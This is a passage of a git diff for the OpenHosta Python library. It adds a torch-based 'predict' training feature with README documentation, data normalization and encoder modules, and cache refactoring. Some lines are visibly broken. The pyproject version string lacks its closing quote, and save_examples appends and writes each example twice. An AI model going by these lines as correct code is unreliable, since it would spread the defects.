+ Defines how many times the model iterates over the training set. Increasing the number of epochs may lead to better model convergence at the cost of longer training times. The default value is 2 times the dataset size, calculated based on the batch size.
+
+- **`complexity` (int)**:
+ Sets the level of complexity for the model, which influences the number of weights based on the length of the input. The default value is `5`.
+
+- **`normalization` (bool)**:
+ Enables or disables data normalization. When set to `True`, the input data will be normalized based on the `norm_min` and `norm_max` values. The default is `False`.
+
+- **`norm_min` (float)**:
+ Defines the minimum value for data normalization. This value helps scale input data to a normalized range. The default is `0.1` for value that are different than 0.
+
+- **`norm_max` (float)**:
+ Specifies the maximum value for data normalization. This value sets the upper bound for the normalized range. The default is `1.0`.
+
+- **`verbose` (bool)**:
+ Enables or disables verbose output during training. When set to `True`, detailed progress information, including loss values, will be displayed. The default is `False`.
+
+- **`batch_size` (int)**:
+ Defines the number of training examples to be used in one iteration. By default, it is set to `5%` of the dataset size or `len(dataset)` if the dataset size is too small for 5%.
+
+---
+
+### Additional `predict` Functionalities
+
+The `predict` function also comes with several methods designed to enhance the user experience when building and refining an *Hosta model*. Below are the key methods you can use to interact with and further train your models:
+
+#### 1. `retrain`
+
+The `retrain` method allows you to retrain the model from scratch. It takes several directive parameters:
+
+- **`epochs`**: Specifies the number of training epochs.
+- **`get_loss`**: Defines a target loss for the model to reach during training.
+- **`verbose`**: Displays detailed training information (if set to `True`).
+
+#### Example:
+```python
+find_chance_of_die.retrain(epochs=150, get_loss=0.001, verbose=True)
+```
+
+#### 2. `continue_train`
+
+The `continue_train` method allows you to continue training the model using the current weights, rather than starting from scratch. It also accepts directive parameters:
+
+- **`epochs`**: Specifies how many additional epochs you want to train the model for.
+- **`get_loss`**: Defines a target loss value for the model to reach during continued training.
+- **`verbose`**: Displays training progress information (if set to `True`).
+
+#### Example:
+```python
+find_chance_of_die.continue_train(epochs=150, get_loss=0.001, verbose=True)
+```
+
+#### 3. `emulate`
+
+The `emulate` function makes an API call to a Large Language Model (LLM) to assist in answering predictions made by the `predict` function. For more details, check the documentation of [predict](#predict-function).
+
+#### Example:
+```python
+find_chance_of_die.emulate(124.0)
+```
+
+---
+
+
+### TrainingSet Management
+
+The `TrainingSet` feature offers easy tools for managing training datasets in `hosta_injected` functions:
+
+- **`.visualize`**: View the current dataset and its examples.
+- **`.add`**: Add new examples to the dataset.
+
+#### Example:
+
+You can generate and add data to your training set like so:
+
+```python
+
+def cos_plus_sin_generator():
+ for i in range(0, 10):
+ for j in range(0, 10):
+ cos_value = math.cos(i) ** i
+ sin_value = math.sin(j) ** j
+ training_maths.add(cos=i, sin=j, hosta_out=cos_value + sin_value)
+ # Add data to the training set
+
+cos_plus_sin_generator()
+training_maths.visualize() # Visualize the dataset
+```
+
+This allows you to both populate and inspect your training data with ease.
+
+---
+
+### Training Output of predict
+
+When training the model using `predict`, a corresponding folder will be created under `__hostachache__`. This folder will contain:
+- `config.json`: Configuration file describing model parameters like structure, training data, etc.
+- `model.pth`: The serialized weights of the trained model.
+- `normalization.json`: Values for data normalization to ensure consistent input/output scaling.
+
+These files are used to manage the model, its saved state, and how incoming data will be normalized before being processed.
+
+## `thought` Function
**Lambda** functions in Python provide a way to create small, anonymous functions. These are defined using the lambda keyword and can have any number of input parameters but only a single expression.
@@ -368,7 +532,7 @@ print(x._return_type) # int
**Note** : ***this feature uses the default model.***
-### "example" Function
+## `example` Function
The "example" function is designed to enhance the context of a function for a LLM by adding examples to it. This functionality is encapsulated in the `example` function.
@@ -376,7 +540,9 @@ The "example" function is designed to enhance the context of a function for a LL
- **Versatile**: The "example" function can be used both inside and outside a function to specify examples.
- **Save**: The "example" function provides a tool called `save_examples` that can store all the examples added to a specified function in a ***JSONL*** file.
-- **Load**: The function also offers a tool called `load_examples` to load a ***JSONL*** file into the context of the function.
+- **Load**: The function also offers a tool called `load_training_example` to load a file into the context of the function especially for `predict function`.
+
+***Notes : `load_examples` can load `csv`, `json` or `jsonl` file for the moment***
Here's how it works:
@@ -396,12 +562,12 @@ example(text="Hello World !", language="japanese", hosta_out="こんにちは世
print(translate("Hello World !", "French"))
```
-The "example" function will verify the correlation between the specified input and the parameters of the function. The output should be specified only in the *hosta_out* parameter. If the example are used outside a function, please use the *hosta_func* parameter to specify a function.
+The `example` function will verify the correlation between the specified input and the parameters of the function. The output should be specified only in the *hosta_out* parameter. If the example are used outside a function, please use the *hosta_func* parameter to specify a function.
-Now here's how works `save_examples` and `load_examples`
+Now here's how works `save_examples` and `load_training_example`
```python
-from OpenHosta import save_examples, load_examples
+from OpenHosta import save_examples, load_training_example
save_examples(hosta_func=translate, hosta_path="translate_func_example")
@@ -413,8 +579,7 @@ def another_translate(text:str, language:str)->str:
"""
return emulate()
-load_examples(hosta_path="translate_func_example.jsonl", hosta_func=another_translate)
-# add the jsonl at the end of the path !
+load_training_example(hosta_path="translate_func_example.jsonl", hosta_func=another_translate)
```
output of the `translate_func_example.jsonl`
diff --git a/pyproject.toml b/pyproject.toml
index 18f4a3b..ca5f911 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
[project]
name = "OpenHosta"
-version = "1.1.2"
+version = "1.2.0
description = "Open-Source programming project IA integretion in developement environnement"
keywords = ["AI", "GPT", "Natural language", "Autommatic", "Easy"]
authors = [
@@ -30,7 +30,9 @@ dependencies = [
"pydantic>=2.8.2",
"tiktoken>=0.7.0",
"jsonschema>=4.23.0",
- "typing-extensions>=4.12.2"
+ "typing-extensions>=4.12.2",
+ "numpy>=2.1.1",
+ "torch>=2.3.1"
]
[project.urls]
diff --git a/src/OpenHosta/OpenHosta.py b/src/OpenHosta/OpenHosta.py
index 259c989..762efae 100644
--- a/src/OpenHosta/OpenHosta.py
+++ b/src/OpenHosta/OpenHosta.py
@@ -5,23 +5,28 @@
)
from .emulate import _exec_emulate
+from .predict import _exec_predict
+from .trainset import TrainingSet
from . import config
from .thought import thought
from .exec import HostaInjector
-from .example import example, load_examples, save_examples
+from .example import example, save_examples, load_training_example
from .enhancer import suggest
emulate = HostaInjector(_exec_emulate)
+predict = HostaInjector(_exec_predict)
__all__ = (
"emulate",
"thought",
"example",
- "load_examples",
"save_examples",
+ "load_training_example",
+ "TrainingSet",
"config",
"Model",
"DefaultManager",
- "suggest"
+ "suggest",
+ "predict"
)
diff --git a/src/OpenHosta/__init__.py b/src/OpenHosta/__init__.py
index 56ad7c5..44e0ee6 100644
--- a/src/OpenHosta/__init__.py
+++ b/src/OpenHosta/__init__.py
@@ -1,3 +1,3 @@
from .OpenHosta import *
-__version__ = "1.1.2"
\ No newline at end of file
+__version__ = "1.2.0"
diff --git a/src/OpenHosta/build.py b/src/OpenHosta/build.py
new file mode 100644
index 0000000..9b56069
--- /dev/null
+++ b/src/OpenHosta/build.py
@@ -0,0 +1,10 @@
+from .config import Model, DefaultManager
+
+def _exec_build(
+ _function_infos : dict = None,
+ _function_obj: object = None,
+ model: Model = None,
+
+):
+ pass
+
diff --git a/src/OpenHosta/builder.py b/src/OpenHosta/builder.py
new file mode 100644
index 0000000..304e9dd
--- /dev/null
+++ b/src/OpenHosta/builder.py
@@ -0,0 +1,57 @@
+import json
+import os
+import torch
+
+from .model import CustomLinearModel
+
+class Builder():
+ def __init__(self, hidden_dir):
+
+ self.hidden_dir = hidden_dir
+
+
+ def build(self, len_input, len_output, complexity, config, optimizer, loss):
+ assert len_input > 0, "Input size must be greater than 0"
+ assert len_output > 0, "Output size must be greater than 0"
+
+ if complexity == None:
+ complexity = 5
+ if optimizer != None:
+ print("\033[93mWarning: The change of optimizer is not available for now, AdamW is actually used.\033[0m")
+ optimizer = "AdamW"
+ if loss != None:
+ print("\033[93mWarning: The change of loss are not available for now, Smooth1Loss is actually used.\033[0m")
+ loss = "SmoothL1Loss"
+
+ if config == None:
+ config = {
+ "architecture": "LinearRegression",
+ "input_size": len_input,
+ "hidden_size_1": len_input * (2 * complexity),
+ "hidden_size_2": len_input * (4 * complexity),
+ "hidden_size_3": len_input * (2 * complexity),
+ "output_size": len_output,
+ "optimizer": optimizer,
+ "loss": loss
+ }
+
+ config_json = json.dumps(config)
+ config_path = os.path.join(self.hidden_dir, "config.json")
+
+ with open(config_path, "w") as f:
+ f.write(config_json)
+ return config["architecture"]
+
+ def load_inference(self, config_path, weight_path, inference):
+ with open(config_path, "r") as file:
+ config = json.load(file)
+
+ model = CustomLinearModel(config, self.hidden_dir)
+ model.load_state_dict(torch.load(weight_path, weights_only=True))
+ output = model.forward(inference)
+ return output
+
+ def trains(self, config, train, val, epochs, verbose, get_loss, continue_training):
+
+ model = CustomLinearModel(config, self.hidden_dir)
+ model.train(train, val, epochs, self.hidden_dir, verbose, get_loss, continue_training)
diff --git a/src/OpenHosta/cache.py b/src/OpenHosta/cache.py
index a0de4a6..23896c5 100644
--- a/src/OpenHosta/cache.py
+++ b/src/OpenHosta/cache.py
@@ -13,7 +13,7 @@
class Hostacache:
- def __init__(self, func, cache_id, value) -> None:
+ def __init__(self, func, cache_id=None, value=None) -> None:
self.func = func
self.cache_id = cache_id
self.value = value
@@ -23,64 +23,74 @@ def __init__(self, func, cache_id, value) -> None:
"return_type": "",
"return_caller": "",
"function_call": "",
+ "function_args": {},
"function_locals": {},
"ho_example": [],
"ho_example_id": 0,
+ "ho_example_links": [],
"ho_cothougt": [],
"ho_cothougt_id": 0,
+ "ho_data": [],
+ "ho_data_id": 0,
}
- def __call__(self):
+ def create_hosta_cache(self):
func_name = self.func.__name__
path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
+ if self.cache_id is None:
+ if os.path.exists(path_name):
+ with open(path_name, "rb") as f:
+ cached_data = pickle.load(f)
+ return cached_data
+ else:
+ return self._parse_and_create_cache_file(path_name)
+
if os.path.exists(path_name):
with open(path_name, "rb") as f:
cached_data = pickle.load(f)
assert self.cache_id in cached_data, "Cache ID not found in cache file"
-
- if self._is_value_already_in_example(self.value, cached_data) == False:
- cached_data[str(self.cache_id)].append(self.value)
- cached_data[f"{str(self.cache_id)}" + "_id"] = self._get_hashFunction(
- str(cached_data[str(self.cache_id)]), 0, 0
- )
- cached_data["hash_function"] = self._get_hashFunction(
- cached_data["function_def"],
- cached_data["ho_example_id"],
- cached_data["ho_cothougt_id"],
- )
- with open(path_name, "wb") as f:
- pickle.dump(cached_data, f)
- return
+ if self.value is not None:
+ if not self._is_value_already_in_example(self.value, cached_data):
+ cached_data[str(self.cache_id)].append(self.value)
+ cached_data[f"{str(self.cache_id)}_id"] = self._get_hashFunction(
+ str(cached_data[str(self.cache_id)]), 0, 0
+ )
+ cached_data["hash_function"] = self._get_hashFunction(
+ cached_data["function_def"],
+ cached_data["ho_example_id"],
+ cached_data["ho_cothougt_id"],
+ )
+ with open(path_name, "wb") as f:
+ pickle.dump(cached_data, f)
+
+ return cached_data
+
+ return self._parse_and_create_cache_file(path_name)
+
+ def _parse_and_create_cache_file(self, path_name):
+ """ When cache_id is None or cache doesn't exist, create a cache just for function metadata """
hosta_args = self._get_argsFunction(self.func)
with open(path_name, "wb") as f:
pickle.dump(hosta_args, f)
- return
-
- def _is_value_already_in_example(self, value, cached_data):
- for item in cached_data["ho_example"]:
- if isinstance(item, dict):
- if item == value:
- return True
- elif isinstance(item, list):
- for sub_item in item:
- if sub_item == value:
- return True
- return False
-
- def _get_hashFunction(self, func_def: str, nb_example: int, nb_thought: int) -> str:
- combined = f"{func_def}{nb_example}{nb_thought}"
- return hashlib.md5(combined.encode()).hexdigest()
+ return hosta_args
def _get_argsFunction(self, func_obj):
self.infos_cache["function_def"], func_prot = self._get_functionDef(func_obj)
self.infos_cache["return_type"], self.infos_cache["return_caller"] = (
self._get_functionReturnType(func_obj)
)
- self.infos_cache[self.cache_id].append(self.value)
- self.infos_cache[f"{str(self.cache_id)}" + "_id"] = self._get_hashFunction(
- str(self.infos_cache[str(self.cache_id)]), 0, 0
- )
+
+ if self.cache_id is not None and self.value is not None:
+ if self.cache_id in self.infos_cache:
+ self.infos_cache[self.cache_id].append(self.value)
+ else:
+ self.infos_cache[self.cache_id] = [self.value]
+
+ self.infos_cache[f"{self.cache_id}_id"] = self._get_hashFunction(
+ str(self.infos_cache[self.cache_id]), 0, 0
+ )
+
self.infos_cache["hash_function"] = self._get_hashFunction(
self.infos_cache["function_def"],
self.infos_cache["ho_example_id"],
@@ -88,6 +98,29 @@ def _get_argsFunction(self, func_obj):
)
return self.infos_cache
+ def _is_value_already_in_example(self, value, cached_data):
+ if self.cache_id not in cached_data:
+ print("Cache ID not found in cache file")
+ return False
+
+ def recursive_check(item, value):
+ if isinstance(item, dict):
+ if item == value or any(recursive_check(v, value) for v in item.values()):
+ return True
+ elif isinstance(item, list):
+ return any(recursive_check(sub_item, value) for sub_item in item)
+ else:
+ return item == value
+
+ for item in cached_data[self.cache_id]:
+ if recursive_check(item, value):
+ return True
+ return False
+
+ def _get_hashFunction(self, func_def: str, nb_example: int, nb_thought: int) -> str:
+ combined = f"{func_def}{nb_example}{nb_thought}"
+ return hashlib.md5(combined.encode()).hexdigest()
+
def _get_functionDef(self, func: Callable) -> str:
sig = inspect.signature(func)
@@ -107,7 +140,10 @@ def _get_functionDef(self, func: Callable) -> str:
if sig.return_annotation != inspect.Signature.empty
else ""
)
- definition = f"def {func_name}({func_params}):{func_return}\n '''\n {func.__doc__}\n '''"
+ definition = (
+ f"```python\ndef {func_name}({func_params}):{func_return}\n"
+ f" \"\"\"\n\t{func.__doc__}\n \"\"\"\n```"
+ )
prototype = f"def {func_name}({func_params}):{func_return}"
return definition, prototype
@@ -161,5 +197,4 @@ def _get_functionReturnType(self, func: Callable) -> Dict[str, Any]:
"Hosta_return_shema", return_hosta_type_any=(Any, ...)
)
return_type = No_return_specified.model_json_schema()
-
- return return_type, return_caller
+ return return_type, return_caller
\ No newline at end of file
diff --git a/src/OpenHosta/config.py b/src/OpenHosta/config.py
index 42623e3..2546623 100644
--- a/src/OpenHosta/config.py
+++ b/src/OpenHosta/config.py
@@ -42,6 +42,7 @@ def __init__(self, model: str = None, base_url: str = None, api_key: str = None)
frozenset: lambda x: frozenset(x),
tuple: lambda x: tuple(x),
bool: lambda x: bool(x),
+ type(None): lambda x: None,
}
if any(var is None for var in (model, base_url)):
@@ -85,7 +86,6 @@ def api_call(
"Content-Type": "application/json",
"Authorization": f"Bearer {self.api_key}",
}
-
self._last_request = l_body
try:
@@ -101,7 +101,7 @@ def api_call(
return response
def request_handler(self, response, return_type, return_caller):
- l_ret = ""
+ l_ret = None
data = response.json()
json_string = data["choices"][0]["message"]["content"]
@@ -122,7 +122,8 @@ def request_handler(self, response, return_type, return_caller):
if "return_hosta_type" in return_type["properties"]:
if return_caller in self.conversion_function:
convert_function = self.conversion_function[return_caller]
- l_ret = convert_function(l_ret_data["return"])
+ if l_ret_data["return"] is not None:
+ l_ret = convert_function(l_ret_data["return"])
else:
l_ret = l_ret_data["return"]
@@ -140,7 +141,7 @@ def request_handler(self, response, return_type, return_caller):
for m in self.__last_request["messages"]:
sys.stderr.write(" "+m["role"]+">\n=======\n", m["content"][0]["text"])
sys.stderr.write("Answer>\n=======\n", l_ret_data["return"])
- lret = None
+ l_ret = None
else:
l_ret = l_ret_data["return"]
diff --git a/src/OpenHosta/datapreparator.py b/src/OpenHosta/datapreparator.py
new file mode 100644
index 0000000..ad21f6d
--- /dev/null
+++ b/src/OpenHosta/datapreparator.py
@@ -0,0 +1,241 @@
+import torch
+from torch.utils.data import DataLoader
+import os
+import json
+import csv
+import numpy as np
+
+from .encoder import HostaEncoder
+from .decoder import HostaDecoder
+
+class Datapreparator():
+ def __init__(self, norm_max, norm_min, encoder=None, decoder=None):
+ self.encoder = encoder if encoder else HostaEncoder()
+ self.decoder = decoder if decoder else HostaDecoder()
+
+ if norm_min:
+ self.norm_min = norm_min
+ else:
+ self.norm_min = 0.1
+ if norm_max:
+ self.norm_max = norm_max
+ else:
+ self.norm_max = 1.0
+
+ self.data_min_nonzero = None
+ self.data_max = None
+ self.data_min = None
+ self.data_range = None
+
+ self.prediction_min_nonzero = None
+ self.prediction_max = None
+ self.prediction_min = None
+ self.prediction_range = None
+
+ def prepare_input(self, in_value):
+ input_data = []
+ for key, value in in_value.items():
+ if isinstance(value, dict):
+ for sub_key, sub_value in value.items():
+ parsed_value = self.encoder.encode(sub_value)
+ input_data.extend(parsed_value)
+ elif isinstance(value, list):
+ for item in value:
+ parsed_value = self.encoder.encode(item)
+ input_data.extend(parsed_value)
+ else:
+ parsed_value = self.encoder.encode(value)
+ input_data.extend(parsed_value)
+ return input_data
+
+ def prepare(self, function_infos, prediction):
+ train = []
+ val = []
+ if function_infos["ho_example"] == [] and function_infos["ho_data"] == []:
+ raise ValueError("No example provided please provide at least one example for the model")
+
+ if function_infos["ho_data"] != []:
+ for example in function_infos["ho_data"]:
+ value = self.parse_dict(example, prediction)
+ train.extend(value)
+ if function_infos["ho_example"] != []:
+ for example in function_infos["ho_example"]:
+ value = self.parse_dict(example, prediction)
+ val.extend(value)
+ else:
+ for example in function_infos["ho_example"]:
+ value = self.parse_dict(example, prediction)
+ train.extend(value)
+ return train, val
+
+ def normalize_dataset(self, train, val):
+ dataset = train + val if val != [] else train
+ data_values = [example[0] for example in dataset]
+ prediction_values = [example[1] for example in dataset]
+
+ data_array = np.array(data_values)
+ prediction_array = np.array(prediction_values)
+
+ negative_data = np.any(data_array < 0, axis=0)
+ negative_prediction = np.any(prediction_array < 0, axis=0)
+
+ self.data_min_nonzero = np.array([
+ np.min(data_array[:, i][data_array[:, i] > 0]) if not negative_data[i] and np.any(data_array[:, i] > 0) else 0
+ for i in range(data_array.shape[1])])
+ self.data_max = data_array.max(axis=0)
+ self.data_min = data_array.min(axis=0)
+
+ self.prediction_min_nonzero = np.array([
+ np.min(prediction_array[:, i][prediction_array[:, i] > 0]) if not negative_prediction[i] and np.any(prediction_array[:, i] > 0) else 0
+ for i in range(prediction_array.shape[1])])
+ self.prediction_max = prediction_array.max(axis=0)
+ self.prediction_min = prediction_array.min(axis=0)
+
+ self.data_range = self.data_max - self.data_min_nonzero
+ self.data_range[self.data_range == 0] = 1
+
+ self.prediction_range = self.prediction_max - self.prediction_min_nonzero
+ self.prediction_range[self.prediction_range == 0] = 1
+
+ normalized_data = np.zeros_like(data_array)
+ for i in range(data_array.shape[1]):
+ zero_mask = data_array[:, i] == 0
+ normalized_data[:, i] = np.where(zero_mask, 0.0, self.norm_min + ((data_array[:, i] - self.data_min_nonzero[i]) / self.data_range[i]) * (self.norm_max - self.norm_min))
+
+ normalized_prediction = np.zeros_like(prediction_array)
+ for i in range(prediction_array.shape[1]):
+ zero_mask = prediction_array[:, i] == 0
+ normalized_prediction[:, i] = np.where(zero_mask, 0.0, self.norm_min + ((prediction_array[:, i] - self.prediction_min_nonzero[i]) / self.prediction_range[i]) * (self.norm_max - self.norm_min))
+
+ # Maybe unwrap the tolist, stay for now because only work after with list
+ normalized_dataset = list(zip(normalized_data.tolist(), normalized_prediction.tolist()))
+ train = normalized_dataset[:len(train)]
+ val = normalized_dataset[len(train):] if val else None
+ return train, val
+
+ def normalize_inference(self, inference_data):
+ inference_data = np.array(inference_data)
+
+ normalized_inference = np.zeros_like(inference_data)
+ for i in range(len(inference_data)):
+ if inference_data[i] == 0:
+ normalized_inference[i] = 0.0
+ else:
+ normalized_inference[i] = self.norm_min + ((inference_data[i] - self.data_min_nonzero[i]) / self.data_range[i]) * (self.norm_max - self.norm_min)
+
+ return normalized_inference.tolist()
+
+ def denormalize_prediction(self, prediction):
+ prediction = prediction.detach().cpu().numpy()
+
+ denormalized_prediction = np.zeros_like(prediction)
+ for i in range(len(prediction)):
+ if prediction[i] == 0:
+ denormalized_prediction[i] = 0.0
+ else:
+ denormalized_prediction[i] = self.prediction_min_nonzero[i] + ((prediction[i] - self.norm_min) / (self.norm_max - self.norm_min)) * self.prediction_range[i]
+
+ return denormalized_prediction.tolist()
+
+ def save_normalization_params(self, path):
+ params = {
+ 'norm_min': self.norm_min,
+ 'norm_max': self.norm_max,
+ 'data_min_nonzero': self.data_min_nonzero.tolist(),
+ 'data_max': self.data_max.tolist(),
+ 'data_min': self.data_min.tolist(),
+ 'data_range': self.data_range.tolist(),
+ 'prediction_min_nonzero': self.prediction_min_nonzero.tolist(),
+ 'prediction_max': self.prediction_max.tolist(),
+ 'prediction_min': self.prediction_min.tolist(),
+ 'prediction_range': self.prediction_range.tolist()
+ }
+ with open(path, 'w') as f:
+ json.dump(params, f)
+
+ def load_normalization_params(self, path):
+ try:
+ with open(path, 'r') as f:
+ params = json.load(f)
+ self.norm_min = params['norm_min']
+ self.norm_max = params['norm_max']
+ self.data_min_nonzero = np.array(params['data_min_nonzero'])
+ self.data_max = np.array(params['data_max'])
+ self.data_min = np.array(params['data_min'])
+ self.data_range = np.array(params['data_range'])
+ self.prediction_min_nonzero = np.array(params['prediction_min_nonzero'])
+ self.prediction_max = np.array(params['prediction_max'])
+ self.prediction_min = np.array(params['prediction_min'])
+ self.prediction_range = np.array(params['prediction_range'])
+ except Exception as e:
+ raise IOError(f"An error occurred while loading the normalization parameters: {e}")
+
+ def convert(self, inference):
+ return torch.tensor(inference, dtype=torch.float32)
+
+ def split(self, train_normalization, val_normalization, batch_size):
+ datatensor = []
+
+ for examples in train_normalization:
+ feature_tensor = torch.tensor(examples[0], dtype=torch.float32)
+ label_tensor = torch.tensor(examples[1], dtype=torch.float32)
+
+ tensor = [feature_tensor, label_tensor]
+ datatensor.append(tensor)
+
+ train = DataLoader(datatensor, batch_size=batch_size, shuffle=True)
+
+ if val_normalization:
+ valtensor = []
+ for examples in val_normalization:
+ feature_tensor = torch.tensor(examples[0], dtype=torch.float32)
+ label_tensor = torch.tensor(examples[1], dtype=torch.float32)
+
+ tensor = [feature_tensor, label_tensor]
+ valtensor.append(tensor)
+ val = DataLoader(valtensor, batch_size=batch_size, shuffle=False)
+ else : val = None
+ return train, val
+
+ def parse_dict(self, example, prediction):
+ dataset = []
+ input_data = []
+ output_data = []
+ for key, value in example.items():
+ if key in prediction or key == "hosta_out":
+ parsed_value = self.encoder.encode(value)
+ output_data.extend(parsed_value)
+ else:
+ parsed_value = self.encoder.encode(value)
+ input_data.extend(parsed_value)
+ dataset.append([input_data, output_data])
+ return dataset
+
+def open_file(ho_examples):
+ list_of_examples = []
+ for path in ho_examples:
+ _, file_extension = os.path.splitext(path)
+ try:
+ if file_extension == '.jsonl':
+ with open(path, "r") as file:
+ for line in file:
+ example = json.loads(line.strip())
+ list_of_examples.append(example)
+
+ elif file_extension == '.csv':
+ with open(path, "r", newline='') as file:
+ csv_reader = csv.DictReader(file)
+ for row in csv_reader:
+ list_of_examples.append(row)
+
+ elif file_extension == '.txt':
+ with open(path, "r") as file:
+ for line in file:
+ list_of_examples.append(line.strip())
+
+ else:
+ raise ValueError("Unsupported file type. Please provide a JSONL, CSV, or TXT file.")
+
+ except Exception as e:
+ raise IOError(f"An error occurred while processing the file: {e}")
+ return list_of_examples
diff --git a/src/OpenHosta/decoder.py b/src/OpenHosta/decoder.py
new file mode 100644
index 0000000..c76aadb
--- /dev/null
+++ b/src/OpenHosta/decoder.py
@@ -0,0 +1,3 @@
+class HostaDecoder():
+ def __init__(self) -> None:
+ pass
diff --git a/src/OpenHosta/encoder.py b/src/OpenHosta/encoder.py
new file mode 100644
index 0000000..a975ad0
--- /dev/null
+++ b/src/OpenHosta/encoder.py
@@ -0,0 +1,36 @@
+from typing import Any
+
+class HostaEncoder():
+ def __init__(self) -> None:
+ None
+
+ def encode(self, value: Any):
+ if type(value) == int:
+ return IntEncoder.encoder(value)
+ elif type(value) == float:
+ return FloatEncoder.encoder(value)
+ elif type(value) == str:
+ try:
+ convert_type = FloatEncoder.encoder(value)
+ return convert_type
+ except:
+ raise ValueError("String cannot be converted to float (numbers in string only supported for now)")
+ else:
+ raise ValueError("Type not supported")
+
+
+class IntEncoder(HostaEncoder):
+ def __init__(self) -> None:
+ super().__init__()
+
+ def encoder(data):
+ data_encode = int(data)
+ return [data_encode]
+
+class FloatEncoder(HostaEncoder):
+ def __init__(self) -> None:
+ super().__init__()
+
+ def encoder(data):
+ data_encode = float(data)
+ return [data_encode]
diff --git a/src/OpenHosta/enhancer.py b/src/OpenHosta/enhancer.py
index 7018163..08a3cb8 100644
--- a/src/OpenHosta/enhancer.py
+++ b/src/OpenHosta/enhancer.py
@@ -68,7 +68,6 @@ def _build_attributes(func: object, last_enh) -> int:
func.review = last_enh["review"]
func.advanced = last_enh["advanced"]
func.diagram = last_enh["mermaid"]
- func.diagramm = last_enh["mermaid"]
return 0
diff --git a/src/OpenHosta/example.py b/src/OpenHosta/example.py
index 6c13b87..4a75954 100644
--- a/src/OpenHosta/example.py
+++ b/src/OpenHosta/example.py
@@ -2,7 +2,10 @@
import pickle
import os
import json
+import csv
+from typing import Callable
+from .errors import FrameError
from .cache import Hostacache
CACHE_DIR = "__hostacache__"
@@ -16,16 +19,13 @@ def example(*args, hosta_func=None, hosta_out=None, **kwargs):
if hosta_func is None:
try:
- func_frame = inspect.currentframe().f_back
- func_name = func_frame.f_code.co_name
- func = func_frame.f_globals[func_name]
+ func, _ = _extend_scope()
except:
- raise ValueError(f"Please provide hosta_func for specifying the function")
-
+ raise ValueError("Please provide hosta_func for specifying the function")
elif callable(hosta_func):
func = hosta_func
else:
- raise ValueError(f"Please provide hosta_func for specifying the function")
+ raise ValueError("Please provide hosta_func for specifying the function")
try:
sig = inspect.signature(func)
@@ -33,60 +33,73 @@ def example(*args, hosta_func=None, hosta_out=None, **kwargs):
input_type[param.name] = param.annotation
output_type["hosta_out"] = sig.return_annotation
except:
- raise ValueError(f"Function does not have signature")
- if args != ():
+ raise ValueError("Function does not have a signature")
+
+ type_verificator(args, kwargs, input_type, output_type, hosta_out, func, example_dict)
+
+ cache_id = "ho_example"
+ cache = Hostacache(func, cache_id, example_dict)
+ cache.create_hosta_cache()
+
+
+def type_verificator(args, kwargs, input_type, output_type, hosta_out, func, example_dict):
+ """
+ Validates the types of both positional and keyword arguments, as well as the return value.
+ """
+
+ if args:
if len(args) != len(input_type):
raise ValueError(
- f"Too many arguments for function {func.__name__}, please provide {len(input_type)} arguments, use hosta_out for output"
+ f"Too many arguments for function {func.__name__}, "
+ f"expected {len(input_type)} arguments, use hosta_out for output."
)
for i, arg in enumerate(args):
param_name = list(input_type.keys())[i]
-
expected_type = input_type[param_name]
+
if not isinstance(arg, expected_type):
- raise ValueError(
- f"Argument {arg} does NOT match the expected type {expected_type} for parameter {param_name}. For function {func.__name__}"
+ raise TypeError(
+ f"Argument {arg} does NOT match the expected type "
+ f"{expected_type} for parameter {param_name} in function {func.__name__}."
)
example_dict[param_name] = arg
else:
if len(kwargs) != len(input_type):
raise ValueError(
- f"Too many arguments for function {func.__name__}, please provide {len(input_type)} arguments, use hosta_out for output"
+ f"Mismatch in number of keyword arguments for function '{func.__name__}', "
+ f"expected {len(input_type)} arguments, use hosta_out for output."
)
for key, value in kwargs.items():
expected_type = input_type[key]
+
if not isinstance(value, expected_type):
- raise ValueError(
- f"Argument {value} does NOT match the expected type {expected_type} for parameter {key}. For function {func.__name__}"
+ raise TypeError(
+ f"Keyword argument {value} does NOT match the expected type "
+ f"{expected_type} for parameter {key} in function {func.__name__}."
)
example_dict[key] = value
if hosta_out is None:
- raise ValueError(f"Please provide hosta_out for output")
+ raise ValueError("Please provide hosta_out for output.")
else:
- expected_type = output_type["hosta_out"]
- if not isinstance(hosta_out, expected_type):
- raise ValueError(
- f"Output {hosta_out} does NOT match the expected type {expected_type}. For function {func.__name__}"
+ expected_output_type = output_type["hosta_out"]
+ if not isinstance(hosta_out, expected_output_type):
+ raise TypeError(
+ f"Output {hosta_out} does NOT match the expected type "
+ f"{expected_output_type} for function {func.__name__}."
)
example_dict["hosta_out"] = hosta_out
- cache_id = "ho_example"
- cache = Hostacache(func, cache_id, example_dict)
- cache()
-
def save_examples(hosta_func=None, hosta_path=None):
cached_data = {}
if hosta_func is None:
try:
- func_frame = inspect.currentframe().f_back
- func_name = func_frame.f_code.co_name
- func = func_frame.f_globals[func_name]
+ func, _ = _extend_scope()
except:
raise ValueError(f"Please provide hosta_func for specifying the function")
@@ -104,49 +117,140 @@ def save_examples(hosta_func=None, hosta_path=None):
func_name = func.__name__
path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
+
try:
if os.path.exists(path_name):
with open(path_name, "rb") as f:
cached_data = pickle.load(f)
- with open(total_path, "w") as t:
+ with open(total_path, "a") as t:
for dict in cached_data["ho_example"]:
t.write(json.dumps(dict) + "\n")
+ t.write(json.dumps(dict) + "\n")
else:
raise ValueError(f"Could not found the cache at {path_name}")
except Exception as e:
raise ValueError(f"Could not found the cache at {path_name}") from e
-def load_examples(hosta_func=None, hosta_path=None):
- if hosta_func is None:
+def load_training_example(hosta_path: str, hosta_func: callable) -> dict:
+ """
+ Load the training example from the cache.
+ """
+ func_name = hosta_func.__name__
+ path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
+
+ cached_data = None
+
+ if os.path.exists(path_name):
try:
- func_frame = inspect.currentframe().f_back
- func_name = func_frame.f_code.co_name
- func = func_frame.f_globals[func_name]
- except:
- raise ValueError(f"Please provide hosta_func for specifying the function")
+ with open(path_name, "rb") as f:
+ cached_data = pickle.load(f)
+ except (pickle.PickleError, IOError) as e:
+ raise ValueError(f"Error loading cache from {path_name}") from e
+ else:
+ cache = Hostacache(hosta_func, None)
+ cache.create_hosta_cache()
+ with open(path_name, "rb") as f:
+ cached_data = pickle.load(f)
- elif callable(hosta_func):
- func = hosta_func
+ _, file_extension = os.path.splitext(hosta_path)
+ if file_extension not in ['.json', '.jsonl', '.csv']:
+ raise ValueError("Unsupported file type. Please provide a JSON or JSONL or CSV file.")
